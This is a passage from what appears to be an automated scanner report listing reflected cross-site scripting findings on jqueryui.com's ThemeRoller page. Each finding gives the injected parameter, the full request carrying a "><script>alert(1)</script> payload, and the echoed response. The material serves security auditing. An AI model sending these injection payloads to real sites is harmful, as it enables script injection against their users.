GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.86. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>7c85cb6c075 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.87. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1068c"><script>alert(1)</script>7eef4e3fb21 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.88. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ad2"><script>alert(1)</script>136246c6494 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.89. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e4"><script>alert(1)</script>34d5273700b was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.90. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ae2"><script>alert(1)</script>6922eb8ad9f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119977

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.91. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5f4"><script>alert(1)</script>c47e4b86f7e was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

3.92. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88cfb"><script>alert(1)</script>71936ccf771 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222288cfb"><script>alert(1)</script>71936ccf771&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.93. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>3489c3a9abe was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888835e81"><script>alert(1)</script>3489c3a9abe&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.94. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd5"><script>alert(1)</script>cf0fd2d235e was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9ccd5"><script>alert(1)</script>cf0fd2d235e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacitySha